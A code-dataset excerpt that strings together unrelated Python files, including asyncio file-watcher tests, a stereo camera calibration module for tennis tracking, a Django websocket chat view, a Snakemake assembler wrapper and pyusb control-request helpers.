def test_returns_src_and_dest_paths_of_move_file_event(self) -> None:
event_path = (self.temporary_directory / 'something.file')
target_path = (self.temporary_directory / 'something.file_2')
source_event = watchdog.events.FileMovedEvent(
str(event_path), str(target_path)
)
self.assertEqual(
phile.watchdog.asyncio.event_to_file_paths(source_event),
(event_path, target_path),
)
class TestFilterPath(
phile.unittest.UsesTemporaryDirectory, unittest.TestCase
):
def test_returns_true_if_passes_filter(self) -> None:
event_path = (self.temporary_directory / 'something.file')
passes_filter = phile.watchdog.asyncio.filter_path(
event_path,
expected_parent=self.temporary_directory,
expected_suffix='.file'
)
self.assertTrue(passes_filter)
def test_returns_false_if_parent_directory_unexpected(self) -> None:
event_path = (self.temporary_directory / 'something.file')
passes_filter = phile.watchdog.asyncio.filter_path(
event_path,
expected_parent=self.temporary_directory / 's',
expected_suffix='.file'
)
self.assertFalse(passes_filter)
def test_returns_false_if_suffix_unexpected(self) -> None:
event_path = (self.temporary_directory / 'something.file_wrong')
passes_filter = phile.watchdog.asyncio.filter_path(
event_path,
expected_parent=self.temporary_directory,
expected_suffix='.file'
)
self.assertFalse(passes_filter)
def test_returns_true_if_expected_suffix_is_blank(self) -> None:
event_path = (self.temporary_directory / 'something.file_wrong')
passes_filter = phile.watchdog.asyncio.filter_path(
event_path,
expected_parent=self.temporary_directory,
expected_suffix=''
)
self.assertTrue(passes_filter)
async def to_async_iter(
source: collections.abc.Iterable[_T]
) -> collections.abc.AsyncIterable[_T]:
for item in source:
yield item
class TestMonitorFileExistence(
UsesObserver,
phile.unittest.UsesTemporaryDirectory,
unittest.IsolatedAsyncioTestCase,
):
def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().__init__(*args, **kwargs)
self.expected_files: (
list[tuple[pathlib.Path, typing.Optional[str]]]
)
self.loader: collections.abc.AsyncIterator[tuple[
pathlib.Path, typing.Optional[str]]]
self.watchdog_view: collections.abc.AsyncIterator[
watchdog.events.FileSystemEvent]
async def asyncSetUp(self) -> None:
await super().asyncSetUp()
self.expected_files = []
self.watchdog_view = await self.schedule_watchdog_observer(
self.temporary_directory
)
self.loader = phile.watchdog.asyncio.load_changed_files(
directory_path=self.temporary_directory,
expected_suffix='.suf',
watchdog_view=self.watchdog_view,
)
    async def assert_returns(self) -> None:
received_files: (
list[tuple[pathlib.Path, typing.Optional[str]]]
) = []
try:
load_aiter = self.loader.__aiter__()
for expected_file in self.expected_files:
found = False
while not found:
received_file = await load_aiter.__anext__()
received_files.append(received_file)
found = (received_file == expected_file)
except BaseException as error:
message = (
'Did not receive\n{expected_files}\n'
'Received\n{received_files}'.format(
expected_files=self.expected_files,
received_files=received_files,
)
)
raise self.failureException(message) from error
async def test_true_for_creation(self) -> None:
src_path = self.temporary_directory / 'a.suf'
source_events: list[watchdog.events.FileSystemEvent] = [
watchdog.events.FileCreatedEvent(str(src_path))
]
existences: list[tuple[pathlib.Path, bool]] = [
(path, existence) async for path, existence in
phile.watchdog.asyncio.monitor_file_existence(
directory_path=self.temporary_directory,
expected_suffix='.suf',
watchdog_view=to_async_iter(source_events),
)
]
self.assertEqual(existences, [(src_path, True)])
async def test_false_for_deletion(self) -> None:
src_path = self.temporary_directory / 'a.suf'
source_events: list[watchdog.events.FileSystemEvent] = [
watchdog.events.FileDeletedEvent(str(src_path))
]
existences: list[tuple[pathlib.Path, bool]] = [
(path, existence) async for path, existence in
phile.watchdog.asyncio.monitor_file_existence(
directory_path=self.temporary_directory,
expected_suffix='.suf',
watchdog_view=to_async_iter(source_events),
)
]
self.assertEqual(existences, [(src_path, False)])
async def test_returns_two_items_for_move(self) -> None:
src_path = self.temporary_directory / 'a.suf'
dest_path = self.temporary_directory / 'b.suf'
source_events: list[watchdog.events.FileSystemEvent] = [
watchdog.events.FileMovedEvent(
str(src_path), str(dest_path)
)
]
existences: list[tuple[pathlib.Path, bool]] = [
(path, existence) async for path, existence in
phile.watchdog.asyncio.monitor_file_existence(
directory_path=self.temporary_directory,
expected_suffix='.suf',
watchdog_view=to_async_iter(source_events),
)
]
self.assertEqual(
existences, [(src_path, False), (dest_path, True)]
)
async def test_ignores_wrong_suffix(self) -> None:
src_path = self.temporary_directory / 'a.suf_wrong'
source_events: list[watchdog.events.FileSystemEvent] = [
watchdog.events.FileCreatedEvent(str(src_path))
]
existences: list[tuple[pathlib.Path, bool]] = [
(path, existence) async for path, existence in
phile.watchdog.asyncio.monitor_file_existence(
directory_path=self.temporary_directory,
expected_suffix='.suf',
watchdog_view=to_async_iter(source_events),
)
]
self.assertEqual(existences, [])
class TestLoadChangedFiles(
UsesObserver,
phile.unittest.UsesTemporaryDirectory,
unittest.IsolatedAsyncioTestCase,
):
def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().__init__(*args, **kwargs)
self.expected_files: (
list[tuple[pathlib.Path, typing.Optional[str]]]
)
self.loader: collections.abc.AsyncIterator[tuple[
pathlib.Path, typing.Optional[str]]]
self.watchdog_view: collections.abc.AsyncIterator[
watchdog.events.FileSystemEvent]
async def asyncSetUp(self) -> None:
await super().asyncSetUp()
self.expected_files = []
self.watchdog_view = await self.schedule_watchdog_observer(
self.temporary_directory
)
self.loader = phile.watchdog.asyncio.load_changed_files(
directory_path=self.temporary_directory,
expected_suffix='.suf',
watchdog_view=self.watchdog_view,
)
    async def assert_returns(self) -> None:
received_files: (
list[tuple[pathlib.Path, typing.Optional[str]]]
) = []
try:
load_aiter = self.loader.__aiter__()
for expected_file in self.expected_files:
found = False
while not found:
received_file = await load_aiter.__anext__()
received_files.append(received_file)
found = (received_file == expected_file)
except BaseException as error:
message = (
'Did not receive\n{expected_files}\n'
'Received\n{received_files}'.format(
expected_files=self.expected_files,
received_files=received_files,
)
)
raise self.failureException(message) from error
async def test_loads_readable_file(self) -> None:
self.expected_files.append(
(self.temporary_directory / 'a.suf', 'b')
)
load_task = asyncio.create_task(self.assert_returns())
await asyncio.sleep(0) # Give the task time to start.
self.expected_files[0][0].write_text('b')
await phile.asyncio.wait_for(load_task)
async def test_returns_none_for_deletion(self) -> None:
await self.test_loads_readable_file()
self.expected_files.clear()
self.expected_files.append(
(self.temporary_directory / 'a.suf', None)
)
load_task = asyncio.create_task(self.assert_returns())
await asyncio.sleep(0)
self.expected_files[0][0].unlink()
await phile.asyncio.wait_for(load_task)
async def test_ignores_wrong_suffix(self) -> None:
self.expected_files.append(
(self.temporary_directory / 'a.suf', 'b')
)
load_task = asyncio.create_task(self.assert_returns())
await asyncio.sleep(0)
(self.temporary_directory / 'b.suf_bad').write_text('no')
self.expected_files[0][0].write_text('b')
await phile.asyncio.wait_for(load_task)
| StarcoderdataPython |
3402131 | <reponame>jerry-git/test-skeleton
import argparse
def cli():
parser = argparse.ArgumentParser(description='Test skeleton creator')
parser.add_argument('input', type=str, help='filepath of input .py file')
parser.add_argument(
'--save', action='store_true', help='save result as test_<input> file')
return parser.parse_args()
| StarcoderdataPython |
349834 | import morphs
import numpy as np
import scipy as sp
import matplotlib.pylab as plt
import seaborn as sns
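# Four-parameter logistic (4PL) curve used for the psychometric fits below:
# A is the lower asymptote, K the upper asymptote, B the slope, and M the
# inflection point along the morph dimension.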
def _cf_4pl(x, A, K, B, M):
return A + (K - A) / (1 + np.exp(-B * (x - M)))
def _4pl(x, y, color=None, **kwargs):
data = kwargs.pop("data")
popt, pcov = sp.optimize.curve_fit(
_cf_4pl, data[x].values, data[y].values, maxfev=10000
)
try:
result_4pl = morphs.logistic.four_param_logistic(popt)
t = np.arange(128) + 1
if color is None:
lines, = plt.plot(x.mean(), y.mean())
color = lines.get_color()
lines.remove()
plt.plot(t, result_4pl(t), color=color)
except TypeError:
pass
def held_out(labels, representations, behavior_subj, psychometric_params, **kwargs):
label_df = morphs.data.neurometric.null.make_label_df(
labels, behavior_subj, psychometric_params
)
behavior_df = morphs.data.neurometric.null.make_behavior_df(
behavior_subj, psychometric_params
)
merged_df = morphs.data.neurometric.null._merge_df(label_df, behavior_df)
held_out_df = morphs.data.neurometric.null.gen_held_out_df(
merged_df, representations, melt=True
)
g = grid(held_out_df, **kwargs)
return held_out_df, g
def grid(
held_out_df,
row_order=None,
col_order=None,
sup_title="",
legend=True,
legend_title="",
p_right_leg_label="Behavioral (True) values",
predicted_leg_label="Predicted values",
sub_title="",
):
held_out_df["legend"] = held_out_df["legend"].map(
{"p_right": p_right_leg_label, "predicted": predicted_leg_label}
)
if row_order is None:
row_order = np.sort(held_out_df["lesser_dim"].unique())
if col_order is None:
col_order = np.sort(held_out_df["greater_dim"].unique())
g = sns.lmplot(
x="morph_pos",
y="p_right",
hue="legend",
col="greater_dim",
row="lesser_dim",
data=held_out_df,
scatter=True,
fit_reg=False,
scatter_kws={"alpha": 0.3},
row_order=row_order,
col_order=col_order,
legend=False,
sharex=False,
)
g.map_dataframe(_4pl, "morph_pos", "p_right")
if legend:
g.add_legend(title=legend_title)
g = g.set_titles(sub_title)
morph_dims = held_out_df["morph_dim"].unique()
morphs.plot.format_morph_dim_label(g, row_order, col_order, morph_dims)
g.set(xlim=(0, 128), ylim=(0, 1), yticks=[0.0, 0.5, 1.0])
g.set_axis_labels("Morph Position", "P(right response)")
if sup_title:
plt.subplots_adjust(top=0.95)
g.fig.suptitle(sup_title)
return g
| StarcoderdataPython |
1688410 | <filename>1.py
def division(a, b):
try:
return a/b
except ZeroDivisionError:
        raise ZeroDivisionError("Division by zero is not allowed")
| StarcoderdataPython |
3354358 | import socket
import time
def check_used(port: int) -> bool:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex(('127.0.0.1', port))
if result == 0:
sock.close()
return True
else:
return False
def alloc(start_from: int = 7000) -> int:
while True:
if check_used(start_from):
print("Port already used: %d" % start_from)
start_from += 1
else:
return start_from
def wait_for(port: int, timeout: int = 5) -> bool:
star_time = time.time()
while not check_used(port):
if time.time() - star_time > timeout:
return False
time.sleep(0.1)
return True
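
# Illustrative usage sketch (not part of the original module); the starting
# port and timeout below are arbitrary example values.
if __name__ == '__main__':
    port = alloc(start_from=8000)  # first free port at or above 8000
    print("Allocated port: %d" % port)
    # wait_for() blocks until something starts listening on the port, or
    # gives up after the timeout and returns False.
    print("In use within 1s: %r" % wait_for(port, timeout=1))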
| StarcoderdataPython |
1794339 | from sklearn.metrics import confusion_matrix, f1_score, roc_curve
import numpy as np
import pandas as pd
import sys
class analysis:
def __init__(self):
pass
def _getComplexParams(self, abs=False):
"""
Function for extracting the data associated with
the second component of the complex source.
To call:
_getComplexParams(abs)
Parameters:
abs Take the absolute value of the difference
Postcondition:
The flux of the second component, the difference
in phases and depth between the two components,
and the noise value are stored in the data
frame "self.dfComplex_"
The model's predicted probability that
the source is complex is also stored.
"""
# ===================================================
# Determine which sources are complex
# ===================================================
loc = np.where(self.testLabel_ == 1)[0]
# ===================================================
# Retrieve the model's prediction that
# the complex source is complex
# ===================================================
prob = self.testProb_[loc]
# ===================================================
# Extract the flux of the second component
# ===================================================
flux = self.testFlux_[loc]
flux = np.asarray([f[1] for f in flux])
# ===================================================
# Compute the difference in phases
# ===================================================
chi = self.testChi_[loc]
chi = np.asarray([c[1] - c[0] for c in chi])
if abs: chi = np.abs(chi)
# ===================================================
# Compute the difference in Faraday depths
# ===================================================
depth = self.testDepth_[loc]
depth = np.asarray([d[1] - d[0] for d in depth])
if abs: depth = np.abs(depth)
# ===================================================
# Retrieve the noise parameter
# ===================================================
sig = self.testSig_[loc]
# ===================================================
# Convert to pandas series
# ===================================================
chi = pd.Series(chi, name='chi')
depth = pd.Series(depth, name='depth')
flux = pd.Series(flux, name='flux')
prob = pd.Series(prob, name='prob')
sig = pd.Series(sig, name="sig")
# ===================================================
# Store the results in a dataframe
# ===================================================
self.dfComplex_ = pd.concat([chi, depth, flux, prob, sig], axis=1)
def _getSimpleParams(self):
"""
Function for extracting the data associated with
the simple sources.
To call:
_getSimpleParams()
Parameters:
None
            Postcondition:
                The flux, phase, Faraday depth, noise value, and the
                model's predicted probability of complexity for each
                simple source are stored in the data frame
                "self.dfSimple_"
        """
# ===================================================
# Determine which sources are complex
# ===================================================
loc = np.where(self.testLabel_ == 0)[0]
# ===================================================
# Retrieve the model's prediction that
# the complex source is complex
# ===================================================
prob = self.testProb_[loc]
# ===================================================
# Extract the flux
# ===================================================
flux = self.testFlux_[loc]
# ===================================================
# Extract the phase
# ===================================================
chi = self.testChi_[loc]
# ===================================================
# Extract the Faraday depth
# ===================================================
depth = self.testDepth_[loc]
# ===================================================
# Retrieve the noise parameter
# ===================================================
sig = self.testSig_[loc]
# ===================================================
# Convert to pandas series
# ===================================================
chi = pd.Series(chi, name='chi')
depth = pd.Series(depth, name='depth')
flux = pd.Series(flux, name='flux')
prob = pd.Series(prob, name='prob')
sig = pd.Series(sig, name="sig")
# ===================================================
# Store the results in a dataframe
# ===================================================
self.dfSimple_ = pd.concat([chi, depth, flux, prob, sig], axis=1)
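    # Sweep decision thresholds from 0.5 to 1.0 in steps of `step`, recompute
    # the class predictions at each threshold, and record the resulting F1
    # score so a preferred operating point can be chosen afterwards.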
def _getF1(self, step=0.025, save=False, suffix='', dir='./'):
try:
self.testProb_
except:
self._test()
threshold = np.arange(0.5, 1, step)
F1 = np.zeros_like(threshold)
for i, p in enumerate(threshold):
testPred = np.where(self.testProb_ > p, 1, 0)
F1[i] = f1_score(self.testLabel_, testPred)
self.threshold_ = threshold
self.F1_ = F1
if save:
np.save(dir + 'threshold' + suffix + '.npy', threshold)
np.save(dir + 'F1' + suffix + '.npy', F1)
def _getROC(self, data='test', save=False, suffix='', dir='./'):
try:
if data == 'train':
fpr, tpr, thresh = roc_curve(self.trainLabel_, self.trainProb_)
elif data == 'valid':
fpr, tpr, thresh = roc_curve(self.validLabel_, self.validProb_)
else:
fpr, tpr, thresh = roc_curve(self.testLabel_, self.testProb_)
except:
print("No data found. Aborting.")
sys.exit(1)
self.fpr_ = fpr
self.tpr_ = tpr
if save:
np.save(dir + 'fpr' + suffix + '.npy', fpr)
np.save(dir + 'tpr' + suffix + '.npy', tpr)
| StarcoderdataPython |
346521 | <filename>Ideas/Tennis Project/Source Code/Camera.py
import cv2
import numpy as np
class Camera:
CameraMatrix = [];
DistCoeffs = [];
Position = [];
RotationVec = [];
TranslationVec = [];
CourtCorners = [];
Homog = [];
# HALF_COURT_X = 4.115;
HALF_COURT_X = 5.485
HALF_COURT_Z = 11.885;
WORLD_POINTS = np.asarray([[-HALF_COURT_X, 0, -HALF_COURT_Z],
[ HALF_COURT_X, 0, -HALF_COURT_Z],
[ HALF_COURT_X, 0, HALF_COURT_Z],
[-HALF_COURT_X, 0, HALF_COURT_Z]], "float");
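    # HALF_COURT_X / HALF_COURT_Z are half the court width / length in meters,
    # and WORLD_POINTS lists the four court corners on the ground plane
    # (y == 0), ordered to correspond to the detected image corners.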
def __init__(self, cameraName, courtCorners):
if cameraName == "kyle":
fx=1994.25368447834;
fy=1988.65266798629;
cx=968.573023612607;
cy=511.585679422200;
k1=0.0771110325943740;
k2=-0.0596894545787290;
p1=0.00178967197419077;
p2=0.00123017525081653;
elif cameraName == "megan":
fx=1981.39204255929;
fy=1973.70141739089;
cx=980.523462971786;
cy=551.217098728122;
k1=0.0747612507420630;
k2=-0.0683271738685350;
p1=0.00240502474003212;
p2=0.00199735586169493;
else:
raise ValueError("cameraName must be 'kyle' or 'megan'!")
return;
self.CourtCorners = courtCorners.copy();
self.CameraMatrix = np.asarray([[fx, 0, cx], [0, fy, cy], [0, 0, 1]]);
self.DistCoeffs = np.asarray([ k1, k2, p1, p2 ]) #np.zeros((4,1)); # TODO: fill
# FIND CAMERA POSITION
imgCoords = np.transpose(courtCorners);
_, rVec, tVec = cv2.solvePnP(self.WORLD_POINTS.reshape((4,1,3)), np.asarray(courtCorners.reshape((4,1,2)), dtype="float"), self.CameraMatrix, self.DistCoeffs,flags=cv2.SOLVEPNP_ITERATIVE);
self.RotationVec = rVec.copy();
self.Rotation = cv2.Rodrigues(rVec)[0];
self.TranslationVec = tVec.copy();
R_inv = np.transpose(self.Rotation);
self.Position = - (np.matmul(R_inv,tVec))[:,0]
#print self.Position
# FIND MAPPING FROM CAM TO WORLD @ Y==0
camPoints = np.zeros((4,2), dtype="float32");
for i in range(0,4):
pt = self.GetPinholePoint(self.CourtCorners[i,:]);
camPoints[i,0] = pt[0]; # U coord
camPoints[i,1] = pt[1]; # V coord
worldPoints = self.WORLD_POINTS[:, [0,2]]
self.Homog = cv2.findHomography(camPoints, worldPoints)[0];
self.InvHomog = np.linalg.inv(self.Homog);
# Undistort the pixel position and convert it to pinhole coordinates w/ focal length 1
def GetPinholePoint(self, pt):
pts = np.zeros((1,1,2));
pts[0,0,0] = pt[0];
pts[0,0,1] = pt[1];
result = cv2.undistortPoints(pts, self.CameraMatrix, self.DistCoeffs);
xy = np.asarray([result[0,0,0], result[0,0,1]]);
return xy
# Convert a point from pixel position to court position
def ConvertPixelToCourtPosition(self, pt):
pinholePt = self.GetPinholePoint(pt);
# Convert a point from pinhole to court position
pt2 = np.asarray([pinholePt[0], pinholePt[1], 1.0]);
res = np.matmul(self.Homog, pt2);
res /= res[2];
return np.asarray([res[0], 0.0, res[1]]);
# Convert 3d point to 2d pixel position
def ConvertWorldToImagePosition(self, pt):
# solve for court point
pt1 = self.Position;
pt2 = pt;
t = - pt2[1] / (pt1[1] - pt2[1]);
isectPt = pt1 * t + pt2 * (1-t);
isectPt = np.asarray([isectPt[0], isectPt[2], 1.0]);
isectPtPinhole = np.matmul(self.InvHomog, isectPt.reshape(3,1));
isectPtPinhole /= isectPtPinhole[2];
pxPt = cv2.projectPoints(isectPtPinhole.reshape(1,1,3), np.identity(3), np.asarray([0,0,0], dtype="float"), self.CameraMatrix, self.DistCoeffs)[0][0][0];
pxPt = np.maximum(np.asarray([0,0]), pxPt);
return np.asarray(pxPt, dtype="uint32")
def GetRay(self, pxPosition):
ctPos = self.ConvertPixelToCourtPosition(pxPosition)
ctMinusCam = ctPos - self.Position;
return (self.Position, ctMinusCam / np.linalg.norm(ctMinusCam));
# output:
# pt is the closest point between rays
# dist is the distance of the two rays at their nearest crossing
# D is the corresponding point on ray1
# E is the corresponding point on ray2
def IntersectRays(ray1, ray2):
A = ray1[0];
a = ray1[1];
B = ray2[0];
b = ray2[1];
c = B - A;
aa = np.dot(a,a);
ac = np.dot(a,c);
bb = np.dot(b,b);
ab = np.dot(a,b);
bc = np.dot(b,c);
D = A + a * ((ac*bb - ab*bc) / (aa*bb - ab*ab));
E = B + b * ((ab*ac - bc*aa) / (aa*bb - ab*ab));
pt = (D+E)/2;
dist = np.linalg.norm(D-E);
return (pt, dist, D, E);
## TEST BENCH:
#from FindCourtCorners import CourtFinder
#cap = cv2.VideoCapture('../UntrackedFiles/stereoClip5_Megan.mov')
#_, frame = cap.read()
#cf = CourtFinder();
#cf.FindCourtCorners(frame);
#corners = np.asarray([[114,454],
# [766,444],
# [1805,835],
# [317,1034]]);
#kyleCam = Camera("kyle", corners);
#for i in range (0, 1):
# print kyleCam.ConvertWorldToImagePosition(np.asarray([0,3,0]));
| StarcoderdataPython |
3384076 | #list comprehension
x = [1, 2, 3, 4, 5]
y = []
for i in x:
    y.append(i**2) #append each value squared
print(x)
print(y)
#value to append + loop + condition
a = [6, 7, 8, 9, 10]
b = [i**2 for i in a]
print (a)
print (b)
#only the odd numbers
z = [i for i in a if i%2 == 1]
print (z)
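#one more illustrative example (not in the original snippet): a conditional
#expression inside the comprehension squares odd values and keeps even ones
c = [i**2 if i % 2 == 1 else i for i in a]
print (c)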
| StarcoderdataPython |
9692124 | """Snakemake wrapper for PLASS Protein-Level Assembler."""
__author__ = "<NAME>"
__copyright__ = "Copyright 2018, <NAME>"
__email__ = "<EMAIL>"
__license__ = "MIT"
from os import path
from snakemake.shell import shell
extra = snakemake.params.get("extra", "")
#allow multiple input files for single assembly
left = snakemake.input.get("left")
single = snakemake.input.get("single")
assert left is not None or single is not None, "please check read inputs"
if left:
    # convert to lists only when paired-end reads were actually provided,
    # so a single-end run never touches snakemake.input.left/right
    left = [snakemake.input.left] if isinstance(snakemake.input.left, str) else snakemake.input.left
    right = [snakemake.input.right] if isinstance(snakemake.input.right, str) else snakemake.input.right
assert len(left) == len(right), "left input needs to contain the same number of files as the right input"
input_str_left = ' ' + " ".join(left)
input_str_right = ' ' + " ".join(right)
input_cmd = input_str_left + ' ' + input_str_right
else:
single = [snakemake.input.single] if isinstance(snakemake.input.single, str) else snakemake.input.single
input_cmd = ' ' + ' '.join(single)
outdir = path.dirname(snakemake.output[0])
tmpdir = path.join(outdir,'tmp')
log = snakemake.log_fmt_shell(stdout=False, stderr=True)
shell("plass assemble {input_cmd} {snakemake.output} {tmpdir} --threads {snakemake.threads} {snakemake.params.extra} {log}")
| StarcoderdataPython |
4802647 | <reponame>PlanTL-SANIDAD/covid-predictive-model
import os
import pandas as pd
if __name__ == '__main__':
dp_df = pd.read_csv("../../raw/06.utf8.csv", delimiter=';', index_col=False)
diag_columns = [col for col in dp_df.columns if 'DIA_' in col]
proc_columns = [col for col in dp_df.columns if 'PROC_' in col]
diag_rows = []
proc_rows = []
for _, row in dp_df.iterrows():
for diag_column in diag_columns:
if not pd.isna(row[diag_column]):
diag_rows.append({'patientid': row['PATIENT ID'], 'diag': row[diag_column]})
for proc_column in proc_columns:
if not pd.isna(row[proc_column]):
proc_rows.append({'patientid': row['PATIENT ID'], 'proc': row[proc_column]})
diag_df = pd.DataFrame(diag_rows)
diag_df_counts = diag_df.groupby(by='patientid').size().reset_index(name='counts')
proc_df = pd.DataFrame(proc_rows)
proc_df_counts = proc_df.groupby(by='patientid').size().reset_index(name='counts')
print(f"{diag_df_counts['counts'].mean()} & {proc_df_counts['counts'].mean()}")
print(f"{diag_df_counts['counts'].std()} & {proc_df_counts['counts'].std()}")
print(f"{diag_df_counts['counts'].median()} & {proc_df_counts['counts'].median()}")
print(f"{diag_df_counts['counts'].max() - diag_df_counts['counts'].min()} & {proc_df_counts['counts'].max() - proc_df_counts['counts'].min()}")
print(f"{diag_df_counts['counts'].min()} & {proc_df_counts['counts'].min()}")
print(f"{diag_df_counts['counts'].max()} & {proc_df_counts['counts'].max()}")
print(f"{diag_df_counts['counts'].sum()} & {proc_df_counts['counts'].sum()}")
print(f"{diag_df_counts['counts'].shape[0]} & {proc_df_counts['counts'].shape[0]}")
print(f"{len(set(diag_df['diag']))} & {len(set(proc_df['proc']))}")
| StarcoderdataPython |
11377422 | <filename>core/views.py
from django.shortcuts import render
from django.shortcuts import render_to_response
from django.template import RequestContext, loader
from django.http import HttpResponse
from django.views.generic import View
from ws4redis.redis_store import RedisMessage
from ws4redis.publisher import RedisPublisher
from ws4redis.redis_store import SELF
import json
def chat(request):
return render_to_response("chat.html", {}, context_instance=RequestContext(request))
def home(request):
return render_to_response("home.html", {}, context_instance=RequestContext(request))
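# Publish a chat notification over the websocket 'notifications' facility,
# fanning the message out through Redis to both the sender and the target user.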
def publishMessage(request):
message = "dummy"
toUser = request.GET['username']
if 'message' in request.GET:
message = request.GET['message']
redis_publisher = RedisPublisher(facility='notifications', users=[request.user.username, toUser])
data = {
'sender':request.user.username,
'message':message
}
message = RedisMessage(json.dumps(data))
redis_publisher.publish_message(message)
return HttpResponse("Published") | StarcoderdataPython |
1945222 | <reponame>sm2774us/amazon_interview_prep_2021
from functools import lru_cache
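# dp(i, j) counts playlists of length i that use exactly j distinct songs:
# either a new song is appended (N - j + 1 choices) or an already-used song is
# replayed, which is only allowed once at least K other songs have been played
# in between (max(j - K, 0) choices). The answer is dp(L, N) modulo 10**9 + 7.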
class Solution:
def numMusicPlaylists(self, N, L, K):
@lru_cache(None)
def dp(i, j): return +(j == 0) if not i else (dp(i-1, j-1) * (N-j+1) + dp(i-1, j) * max(j-K, 0)) % (10**9+7)
return dp(L, N) | StarcoderdataPython |
8168999 | # Copyright (C) 2009-2011 <NAME>
#
# The following terms apply to all files associated
# with the software unless explicitly disclaimed in individual files.
#
# The authors hereby grant permission to use, copy, modify, distribute,
# and license this software and its documentation for any purpose, provided
# that existing copyright notices are retained in all copies and that this
# notice is included verbatim in any distributions. No written agreement,
# license, or royalty fee is required for any of the authorized uses.
# Modifications to this software may be copyrighted by their authors
# and need not follow the licensing terms described here, provided that
# the new terms are clearly indicated on the first page of each file where
# they apply.
#
# IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
# FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
# ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
# DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
# IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
# NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
# MODIFICATIONS.
r"""usb.control - USB standard control requests
This module exports:
get_status - get recipient status
clear_feature - clear a recipient feature
set_feature - set a recipient feature
get_descriptor - get a device descriptor
set_descriptor - set a device descriptor
get_configuration - get a device configuration
set_configuration - set a device configuration
get_interface - get a device interface
set_interface - set a device interface
"""
__author__ = '<NAME>'
__all__ = ['get_status',
'clear_feature',
'set_feature',
'get_descriptor',
'set_descriptor',
'get_configuration',
'set_configuration',
'get_interface',
'set_interface',
'ENDPOINT_HALT',
'FUNCTION_SUSPEND',
'DEVICE_REMOTE_WAKEUP',
'U1_ENABLE',
'U2_ENABLE',
'LTM_ENABLE']
import usb.util as util
import usb.core as core
def _parse_recipient(recipient, direction):
if recipient is None:
r = util.CTRL_RECIPIENT_DEVICE
wIndex = 0
elif isinstance(recipient, core.Interface):
r = util.CTRL_RECIPIENT_INTERFACE
wIndex = recipient.bInterfaceNumber
elif isinstance(recipient, core.Endpoint):
r = util.CTRL_RECIPIENT_ENDPOINT
wIndex = recipient.bEndpointAddress
else:
raise ValueError('Invalid recipient.')
bmRequestType = util.build_request_type(
direction,
util.CTRL_TYPE_STANDARD,
r
)
return (bmRequestType, wIndex)
# standard feature selectors from USB 2.0/3.0
ENDPOINT_HALT = 0
FUNCTION_SUSPEND = 0
DEVICE_REMOTE_WAKEUP = 1
U1_ENABLE = 48
U2_ENABLE = 49
LTM_ENABLE = 50
def get_status(dev, recipient = None):
r"""Return the status for the specified recipient.
dev is the Device object to which the request will be
sent to.
    The recipient can be None (in which case the status of the device
    itself is queried), or an Interface or Endpoint descriptor.
The status value is returned as an integer with the lower
word being the two bytes status value.
"""
bmRequestType, wIndex = _parse_recipient(recipient, util.CTRL_IN)
ret = dev.ctrl_transfer(bmRequestType = bmRequestType,
bRequest = 0x00,
wIndex = wIndex,
data_or_wLength = 2)
return ret[0] | (ret[1] << 8)
def clear_feature(dev, feature, recipient = None):
r"""Clear/disable a specific feature.
dev is the Device object to which the request will be
sent to.
feature is the feature you want to disable.
    The recipient can be None (in which case the request is addressed
    to the device), or an Interface or Endpoint descriptor.
"""
bmRequestType, wIndex = _parse_recipient(recipient, util.CTRL_OUT)
dev.ctrl_transfer(bmRequestType = bmRequestType,
bRequest = 0x01,
wIndex = wIndex,
wValue = feature)
def set_feature(dev, feature, recipient = None):
r"""Set/enable a specific feature.
dev is the Device object to which the request will be
sent to.
feature is the feature you want to enable.
    The recipient can be None (in which case the request is addressed
    to the device), or an Interface or Endpoint descriptor.
"""
bmRequestType, wIndex = _parse_recipient(recipient, util.CTRL_OUT)
dev.ctrl_transfer(bmRequestType = bmRequestType,
bRequest = 0x03,
wIndex = wIndex,
wValue = feature)
def get_descriptor(dev, desc_size, desc_type, desc_index, wIndex = 0):
r"""Return the specified descriptor.
dev is the Device object to which the request will be
sent to.
desc_size is the descriptor size.
desc_type and desc_index are the descriptor type and index,
respectively. wIndex index is used for string descriptors
and represents the Language ID. For other types of descriptors,
it is zero.
"""
wValue = desc_index | (desc_type << 8)
bmRequestType = util.build_request_type(
util.CTRL_IN,
util.CTRL_TYPE_STANDARD,
util.CTRL_RECIPIENT_DEVICE
)
return dev.ctrl_transfer(
bmRequestType = bmRequestType,
bRequest = 0x06,
wValue = wValue,
wIndex = wIndex,
data_or_wLength = desc_size
)
def set_descriptor(dev, desc, desc_type, desc_index, wIndex = None):
r"""Update an existing descriptor or add a new one.
dev is the Device object to which the request will be
sent to.
The desc parameter is the descriptor to be sent to the device.
desc_type and desc_index are the descriptor type and index,
respectively. wIndex index is used for string descriptors
and represents the Language ID. For other types of descriptors,
it is zero.
"""
wValue = desc_index | (desc_type << 8)
bmRequestType = util.build_request_type(
util.CTRL_OUT,
util.CTRL_TYPE_STANDARD,
util.CTRL_RECIPIENT_DEVICE
)
dev.ctrl_transfer(
bmRequestType = bmRequestType,
bRequest = 0x07,
wValue = wValue,
wIndex = wIndex,
data_or_wLength = desc
)
def get_configuration(dev):
r"""Get the current active configuration of the device.
dev is the Device object to which the request will be
sent to.
This function differs from the Device.get_active_configuration
    method because the latter may use cached data, while this
function always does a device request.
"""
bmRequestType = util.build_request_type(
util.CTRL_IN,
util.CTRL_TYPE_STANDARD,
util.CTRL_RECIPIENT_DEVICE
)
return dev.ctrl_transfer(
bmRequestType,
bRequest = 0x08,
data_or_wLength = 1
)[0]
def set_configuration(dev, bConfigurationNumber):
r"""Set the current device configuration.
dev is the Device object to which the request will be
sent to.
"""
dev.set_configuration(bConfigurationNumber)
